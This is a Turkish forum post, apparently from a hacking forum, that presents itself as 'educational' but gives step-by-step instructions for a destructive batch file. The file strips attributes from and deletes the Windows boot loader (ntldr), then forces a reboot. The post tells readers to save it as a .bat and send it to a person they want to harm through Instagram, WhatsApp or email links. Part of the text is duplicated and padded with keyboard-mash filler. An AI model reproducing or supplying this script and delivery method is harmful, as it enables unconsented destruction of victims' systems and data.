Merhaba Kardeşlerim Dostlarım ve Sebgili SPY Yetkilileri bu gün size eğitici bir konu hazırladım Konumuzun amacı Bilgisayara Format Atan Vürüs bu konudaki amacım kimseye zarar vermek değildir eğitici bir konu olması için bahsediyorum.bu vürüsün doğracağı sıkıntılar benim sorumluluğum altında değildir gidipde ibnelk yapıp öğretmenlere ya bir kuruma zarar vermeyin şöyle bırakıyorum saygılarımla vux 
İlk önce ilişki kurduğunuz bilgisayara erişim sağlayın sağlanan erişimin ardından bilgisayarda bulunan not defterini masaüstü bölümünde açınız .
başka bir nanae yok kodları girip anlık olarak vux medya vurdu yapacağız fdvvfdfddf neyse
daha sonra şu şekilde kodları giriniz
yazdınız diye umarak devam ediyorum sonra sol üsten dosya ardından kayıt et kutucuğuna saplayın dvsdsfds
sonra aynı şeklde geri gelerek farklı kayıt et kutucuğuna zorlayın
atıyorum dosya ismi vux.txt demi bunu vux.bat yapıyoruz farklı kayıt et ile sonra abi arkadaşınızın hedef bilgisayarında açın ya zarara uğratmak istediğiniz kişiye ig üzerinden dosya.co link haline getirerek ya wp ya ig ya da mail yoluyla salayın anlık olarak silkilecektir
kolay gelsin iyi forumlar güzel insanlar
İlk önce ilişki kurduğunuz bilgisayara erişim sağlayın sağlanan erişimin ardından bilgisayarda bulunan not defterini masaüstü bölümünde açınız .
başka bir nanae yok kodları girip anlık olarak vux medya vurdu yapacağız fdvvfdfddf neyse
daha sonra şu şekilde kodları giriniz
HTML:
cd..
cd..
attrib -s -h -r -a c:\ntldr
del c:\ntldr
shutdown -r
yazdınız diye umarak devam ediyorum sonra sol üsten dosya ardından kayıt et kutucuğuna saplayın dvsdsfds
sonra aynı şeklde geri gelerek farklı kayıt et kutucuğuna zorlayın
atıyorum dosya ismi vux.txt demi bunu vux.bat yapıyoruz farklı kayıt et ile sonra abi arkadaşınızın hedef bilgisayarında açın ya zarara uğratmak istediğiniz kişiye ig üzerinden dosya.co link haline getirerek ya wp ya ig ya da mail yoluyla salayın anlık olarak silkilecektir